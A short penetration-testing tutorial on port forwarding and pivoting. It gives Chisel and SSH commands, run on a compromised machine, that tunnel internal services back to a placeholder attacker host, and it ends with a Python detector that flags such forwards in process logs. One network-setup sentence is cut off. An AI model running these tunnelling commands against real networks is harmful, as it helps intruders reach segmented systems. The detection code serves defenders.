Port Forwarding
Port forwarding is a technique in which a service running on the target machine, or on any other machine on its network, is forwarded to the attacker's machine, where it can then be accessed locally.
Commonly used tools
- Chisel
- SSH
Local port forwarding is a technique to transfer a service running on the compromised machine to the attacker's machine.
Attacker's Machine:
./chisel server -p 1337 --reverse
Compromised Machine:
# Forward the service on the compromised machine's port 5000 to the attacker machine's port 5000
./chisel client attackerip:1337 R:5000:127.0.0.1:5000
# The same on ssh
# Format: ssh -L attackermachineport:127.0.0.1:targetserviceport user@target
ssh -L 5000:127.0.0.1:5000 user@targetIP
Remote port forwarding is a technique to transfer a service running on a machine that is present in the same network as the compromised machine to the attacker's machine.
Network Setup:
Machine A : Attacker's Machine
Machine B : Compromised Machine ( Has a network card to communicate with Y network )
Machine C : Machine on Y network
A ---> B ( Attacker can communicate with the Machine B )
B ---> C ( Machine B can communicate with both A and C with different network cards )
A --x-> C ( Attacker cannot communicate with the C since they are
Attacker's Machine:
./chisel server -p 9001 --reverse
Compromised Machine ( Machine B ):
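# Machine C has a service on its port 3000 which has to be forwarded to the attacker machine's port 3000
# Chisel reverse remote format: R:listenport:desthost:destport (listenport opens on the chisel server)
./chisel client attackerip:9001 R:3000:machineCIP:3000
# The same can be performed with SSH
# Format: ssh -R [REMOTE:]REMOTE_PORT:DESTINATION:DESTINATION_PORT [USER@]SSH_SERVER
# Run on Machine B; SSH_SERVER is the attacker's machine, where REMOTE_PORT 3000 is opened
ssh -R 3000:machineCIP:3000 user@attackerip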
Dynamic port forwarding is a pivoting technique that, with the use of proxychains, allows the attacker to access all of the services running on the compromised system.
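For detection, the forward specs used above can be pulled out of process command lines and classified by where the listener opens and whether the destination is another host. This is an added example, not part of the original notes or of chisel or OpenSSH; the function names and the log lines are constructed, and it assumes full `[bind:]port:host:port` specs with the chisel server address directly after `client`.

```python
import shlex

LOOPBACK = {"127.0.0.1", "localhost", "::1"}

def parse_spec(spec):
    """Parse [bind:]listen_port:dest_host:dest_port; return None if malformed."""
    parts = spec.split("/")[0].split(":")       # drop chisel's optional /protocol
    if len(parts) == 4:                         # optional bind address present
        parts = parts[1:]
    if len(parts) != 3 or not (parts[0].isdigit() and parts[2].isdigit()):
        return None
    return int(parts[0]), parts[1], int(parts[2])

def find_forwards(cmdline):
    """Return one finding per port forward requested on a process command line."""
    argv = shlex.split(cmdline) or [""]
    prog = argv[0].rsplit("/", 1)[-1]
    specs = []                                  # (spec, side where the listener opens)
    if prog == "ssh":
        for i, arg in enumerate(argv):
            if arg[:2] in ("-L", "-R"):         # accepts "-L spec" and "-Lspec"
                spec = arg[2:] or (argv[i + 1] if i + 1 < len(argv) else "")
                specs.append((spec, "ssh client" if arg[1] == "L" else "ssh server"))
    elif prog == "chisel" and "client" in argv[1:]:
        for arg in argv[argv.index("client") + 2:]:   # skip the server address
            if arg.startswith("R:"):
                specs.append((arg[2:], "chisel server"))
            elif not arg.startswith("-"):
                specs.append((arg, "chisel client"))
    findings = []
    for spec, side in specs:
        parsed = parse_spec(spec)
        if parsed:
            port, host, dport = parsed
            findings.append({"listener": side, "listen_port": port,
                             "dest": f"{host}:{dport}", "pivot": host not in LOOPBACK})
    return findings

# Constructed process-audit lines (documentation-range addresses, not real hosts).
SAMPLE_LOG = [
    "./chisel client 192.0.2.10:1337 R:5000:127.0.0.1:5000",
    "ssh -L 5000:127.0.0.1:5000 user@198.51.100.5",
    "./chisel client 192.0.2.10:9001 R:3000:10.0.0.7:3000",
    "ssh user@198.51.100.5 uptime",
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(line, "->", find_forwards(line))
```

A finding with `pivot` set to true means the host running the command is relaying traffic to a different machine, which is the Machine B to Machine C case in the network setup above.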